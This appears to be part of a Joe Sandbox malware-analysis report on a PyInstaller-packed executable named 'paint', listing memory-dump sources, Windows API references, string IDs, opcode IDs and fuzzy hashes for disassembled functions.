                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                                                • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                • Instruction ID: 188da01fbd1217558132e3043fc76005b0ac9a0891bc233e322a14be12081a13
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2021D511F1CA4262FF905761A89037D5696DF86BA0FA842B5DA3FC73C1EE6DF4458300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                • Instruction ID: f44f6f3032b1933a7c1f4286aec8d8bcb5a27749d9fbf57c0ef4dfd71e3e5353
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B41F232908201D7EB348B19A44067A77A4EB47B80F904171DAAFC77D2EF2EF402CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                                                • Opcode ID: 554522ddaaea23f3b5e6aea8caa2321bb654765c5323d1260ad4ea2226cb13d0
                                                                                                                                                                                                                                                                • Instruction ID: c4ca71f214e1fba252958b26d5fe2d9568249544969e4d9ec9bdc101b91cf29f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 554522ddaaea23f3b5e6aea8caa2321bb654765c5323d1260ad4ea2226cb13d0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D21E721B1965266FB14AB1269047BAE652BF47BC4FCC4430EE2E877C6EE7EE045C640
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                • Instruction ID: 3d1b319e6ae49f0ec4debbcef323aebba5cfcf15e587e925038eadfd4046369b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3231E132E18642A5FB115B55984177D2660AF42F94FC202B5EA3F833D2EF7EE8418720
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                • Instruction ID: 844259b4545c7f2faf098c225a1584e00bf7d74b7241a3aa4d9de9a85b274a03
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD116322A1C64291EF609F5194201BEA3A4AF47B80FD540B1EB5ED7BD6EF7EE5408780
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4225454184-0
                                                                                                                                                                                                                                                                • Opcode ID: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
                                                                                                                                                                                                                                                                • Instruction ID: 25ca79faa81420d8b57ef299b6a8d2b5d450f08d05728840ef4083db7434d137
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C11E711B0A68344EF558B16AA666FE5257DF16FC4F081031FE6D0BBEDEE2CE4825B40
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                • Instruction ID: 12ece5c7f8db83eeb07587a4dcfa2cbaac6729c9bdb9b5f23357cf0042e842c9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F221F972618A4297D7619F58D44037972A4FB86B55F944234EAAFC77D9EF3ED8008B00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                • Instruction ID: ef6cb37b68703d6a30644634edae043bd8c9d68e9b5b450b3a4cf76554f29de3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8201C461A1874250EB04DF529E01069A6B5BF97FE0F884671EF7D97BDAEE3EE1814300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00007FF6F0BD6466,?,00007FF6F0BD336E), ref: 00007FF6F0BD9092
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2592636585-0
                                                                                                                                                                                                                                                                • Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                                                • Instruction ID: 7d3173d434fec1d7020c642541ca7b2e435d2a188fcc3a869de591f1992c8b72
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9D08C11B2424651EB54A767BA4662A9252AB8ABC0E888035EE2E43B8AEC3DC0414B00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2016607190.00007FFE00761000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016576633.00007FFE00760000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE007E3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE0080D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE00818000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE00823000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016859124.00007FFE00827000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffe00760000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                • Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                                • Instruction ID: 2c4080e693f30776634ba9d2c2f66456547a75d61390a7110f310b8cb6a3c1ec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F217132B08B8187E7549B26A5446AEB2A5FB88B94F584135EB8D43FA9CF3CD451CB04
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF6F0BE0D00,?,?,?,00007FF6F0BE236A,?,?,?,?,?,00007FF6F0BE3B59), ref: 00007FF6F0BED6AA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                • Instruction ID: d6683fa3ae1bdfc8c4d2a37fa4b6c07706ba87b9afd52ff45121e21a8bf76aef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1F05804F09303B8FF6467A1590167812904F96BA0F880370DD3FCB3C6FEAEA4808210
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                                • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                                • Instruction ID: a22e0a3c8163d40ef9c95ded053830d06f46bc37fcf410426d6ab20a6e838ce3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0D1C232A09A82E6EB108F74E8506A97765FF86B59F800235DA6E837E4EF3DD104C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                                                • API String ID: 4225454184-1067337024
                                                                                                                                                                                                                                                                • Opcode ID: f34923dd5e9eb12801e09e26d8048321a22b23a76132290968c844465b19779d
                                                                                                                                                                                                                                                                • Instruction ID: 520b531f2b96d83629182c7cbd0a80ef5bc8f9936ae38898cfb44eeacd86426a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f34923dd5e9eb12801e09e26d8048321a22b23a76132290968c844465b19779d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50020063F0E68345FF658B249070B792A91AB52B9CF184235CFBE476E9DE3DE4618700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013426793.00007FFDFAA01000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAA00000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013391762.00007FFDFAA00000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAA62000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAAE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAB2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAB7000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB14000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB17000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013772305.00007FFDFAB18000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaa00000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A461ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2528831389-0
                                                                                                                                                                                                                                                                • Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                                                • Instruction ID: 653c062766fc53e6493072f518a89a06c6279ea6e2bde46ab17aefa2248b5286
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59316D72709B928AEBA48F60E8607ED3364FB84744F48803ADA5E47B99DF38C54DC710
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD841B
                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD849E
